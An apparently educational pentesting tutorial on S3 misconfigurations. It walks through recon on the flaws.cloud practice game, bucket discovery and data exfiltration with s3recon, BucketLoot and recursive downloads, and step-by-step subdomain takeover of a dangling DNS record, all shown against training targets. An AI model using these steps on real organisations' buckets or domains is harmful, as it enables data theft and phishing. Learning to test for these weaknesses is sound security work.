S3 Bucket Kicking

Amazon Simple Storage Service (S3) is a very popular storage service offered by AWS.

S3 storage uses ‘buckets’ as the unit of storage, with the individual files stored inside a bucket known as ‘objects’.

Because S3 buckets are used to store all kinds of data, they are sometimes misconfigured in ways that grant excessive privileges on bucket objects to unauthorised external parties.

Recon

You can determine the site is hosted as an S3 bucket by running a DNS lookup on the domain, such as:

dig +nocmd flaws.cloud any +multiline +noall +answer
# Returns:
# flaws.cloud.            5 IN A  54.231.184.255

Visiting 54.231.184.255 in your browser will direct you to https://aws.amazon.com/s3/

So you know flaws.cloud is hosted as an S3 bucket.
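
You can also confirm this from the command line; S3 endpoints typically identify themselves in the Server response header (exact output may vary):

curl -sI http://flaws.cloud/ | grep -i '^server'
# Returns (typically):
# Server: AmazonS3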

You can then run:

nslookup 54.231.184.255
# Returns:
# Non-authoritative answer:
# 255.184.231.54.in-addr.arpa     name = s3-website-us-west-2.amazonaws.com

So we know it's hosted in the AWS region us-west-2.

Side note (not useful for this game): All S3 buckets, when configured for web hosting, are given an AWS domain you can use to browse to it without setting up your own DNS. In this case, flaws.cloud can also be visited by going to

http://flaws.cloud.s3-website-us-west-2.amazonaws.com/

You now know that there is a bucket named flaws.cloud in us-west-2, so you can attempt to list its contents with the AWS CLI by running:

aws s3 ls s3://flaws.cloud/ --no-sign-request --region us-west-2

If you didn't happen to know the region, there are only a dozen or so regions to try. You could also use the GUI tool Cyberduck to browse this bucket, and it will figure out the region automatically.
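
If you want to script that search, a small shell loop over candidate regions is one rough approach (the region list below is illustrative rather than exhaustive, and a wrong region may simply return a redirect error, which is itself a hint):

for region in us-east-1 us-east-2 us-west-1 us-west-2 eu-west-1 eu-central-1 ap-southeast-1 ap-northeast-1; do
    echo "== $region =="
    aws s3 ls s3://flaws.cloud/ --no-sign-request --region "$region" && break
done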

Finally, you can also just visit http://flaws.cloud.s3.amazonaws.com/, which lists the files because of the loose permissions on this bucket.

The next level's bucket also has overly loose permissions, but it is only readable by authenticated AWS users, so you need your own AWS account to see what's inside. Using a profile from your own account you can run:

aws s3 --profile YOUR_ACCOUNT ls s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud

Let us take a look at a couple of misconfiguration scenarios for S3 buckets:

Discovering Misconfigured Buckets

Potential Impact - Sensitive Data Exposure

In this scenario, we will go through the process of discovering misconfigured public buckets, look at how these buckets can be exploited, and see how the data present within them can then be exfiltrated.

There are multiple tools available for this purpose; for our use case we will be using the s3recon tool.

Prerequisites:

s3recon requires Python >=v3.6.

Installation:

pip install s3recon

Using pip directly to install a tool can break system packages; the better alternative is to install pipx and then install the tool using:

pipx install s3recon

Now that we have the tool ready, we must also provide a text file containing the keywords we need to look for.

So, if we need to search for public S3 buckets associated with Payatu, we might use the keyword ‘test’ and add it to the list:

echo "test" >> wrds.txt

The scan turns up a public bucket named test-staging. Now that we have the name of a public bucket, let's see how we can exfiltrate data from it.

For this, we’ll be using a tool called BucketLoot.

This newly released tool allows us to exfiltrate sensitive information from publicly exposed S3 buckets.

Prerequisites:

This tool requires Go (Golang) to be installed on the system.
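
You can quickly verify that Go is installed and on your PATH:

go version
# Returns something like:
# go version go1.21.5 linux/amd64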

Let’s install the tool using:

git clone https://github.com/redhuntlabs/BucketLoot.git
cd BucketLoot
go build

We can now run the tool to scan our S3 bucket using:

./bucketloot https://test-staging.s3.amazonaws.com

We can also use multiple options with the tool. For example, if we wanted to search for a specific keyword within the bucket, we could do so using:

./bucketloot https://test-staging.s3.amazonaws.com -search <KEYWORD>

We can then download the file contents using:

aws s3 cp s3://<BUCKET NAME>/<OBJECT KEY> ./

💡 Tip: In case you wish to download the entire bucket, you can add the --recursive flag to the command:

aws s3 cp s3://<BUCKET NAME> ./ --recursive

Subdomain Takeover via website hosted on S3

Potential Impact - Adversaries can take over a subdomain and use it for phishing attempts or to serve malicious content to unsuspecting victims.

S3 buckets are not only used to store data, but can also be used to host static websites. When a website is served via an S3 bucket, the DNS record for the domain must point towards the static website endpoint for the bucket.

Sometimes, when S3 buckets hosting static websites are deleted, the developers forget to remove the corresponding DNS records for the bucket.

A record which points towards a non-existent resource is known as a “dangling” DNS record.
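
For example, using a made-up subdomain, a dangling record pointing at an S3 website endpoint might look something like this (the endpoint region is an assumption for illustration):

dig +short CNAME static.example.com
# Returns something like:
# static.example.com.s3-website-us-east-1.amazonaws.com.
# If no bucket named static.example.com exists, the endpoint answers with a
# "NoSuchBucket" error page, and the record is dangling.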

Let’s look at how to take over a sub-domain if it has a dangling record pointing to an S3 bucket.

Whenever we are given a target domain, one of the first steps is to enumerate its subdomains. While there are multiple tools available for this purpose, we are going to use the knockpy tool here:

Prerequisites

Python v3

Installation

git clone https://github.com/guelfoweb/knock.git
cd knock
python3 setup.py install

Knockpy can now be used directly as a CLI tool.

Now, to perform subdomain enumeration, we are going to need a wordlist containing possible domain names.

There are some great wordlists available for DNS brute-forcing in the SecLists repository.

We’ll be using the namelist.txt wordlist from its Discovery/DNS directory.

Download the repository using:

git clone https://github.com/danielmiessler/SecLists.git

The target domain we’ll be using is cloudheck.site, which has been set up specifically for this exercise. So, our knockpy command becomes:

knockpy cloudheck.site -w ~/SecLists/Discovery/DNS/namelist.txt

We have found two subdomains: app.cloudheck.site and ctf.cloudheck.site. We add them to a list called sublist.txt.
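
One way to create that file:

printf '%s\n' app.cloudheck.site ctf.cloudheck.site > sublist.txt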

Now, we need to check these subdomains for sub-domain takeover vulnerabilities.

For that, we’ll use the subdover tool:

git clone https://github.com/PushpenderIndia/subdover.git
cd subdover
chmod +x installer_linux.py
sudo python3 installer_linux.py
chmod +x subdover.py
python3 subdover.py -l sublist.txt

If subdover reports that app.cloudheck.site points to a non-existent S3 bucket, we can create an S3 bucket with that exact name in our own account and take over the subdomain.

Steps:

  1. Log in to the AWS Console

  2. Access the S3 console at

    https://s3.console.aws.amazon.com

  3. Select “Create bucket”

  4. Create an S3 bucket with the exact same name as the target sub-domain (in this case, app.cloudheck.site).

  5. Deselect the “Block all public access” setting:

    1. Leave the rest of the settings as-is and click on Create bucket.

    2. Once the bucket is created, go to Properties, and enable Static website hosting

    3. Under index document, specify ‘index.html’

    4. Under the bucket's Permissions tab, add a bucket policy that allows public read access to the objects:

       {
         "Version": "2012-10-17",
         "Statement": [
           {
             "Sid": "PublicReadGetObject",
             "Effect": "Allow",
             "Principal": "*",
             "Action": ["s3:GetObject"],
             "Resource": ["arn:aws:s3:::app.cloudheck.site/*"]
           }
         ]
       }
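
For reference, roughly the same setup can be sketched from the AWS CLI instead of the console. This is only an outline under a few assumptions: the bucket is created in us-east-1 (in practice it must live in whichever region the dangling website endpoint points to), and policy.json contains the bucket policy shown above:

# Claim the bucket name and allow a public bucket policy
aws s3api create-bucket --bucket app.cloudheck.site --region us-east-1
aws s3api put-public-access-block --bucket app.cloudheck.site \
    --public-access-block-configuration BlockPublicAcls=false,IgnorePublicAcls=false,BlockPublicPolicy=false,RestrictPublicBuckets=false
aws s3api put-bucket-policy --bucket app.cloudheck.site --policy file://policy.json

# Enable static website hosting and upload a harmless proof-of-concept page
aws s3 website s3://app.cloudheck.site/ --index-document index.html
echo "<h1>Subdomain takeover PoC</h1>" > index.html
aws s3 cp index.html s3://app.cloudheck.site/

# The hijacked subdomain should now serve our content
curl http://app.cloudheck.site/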
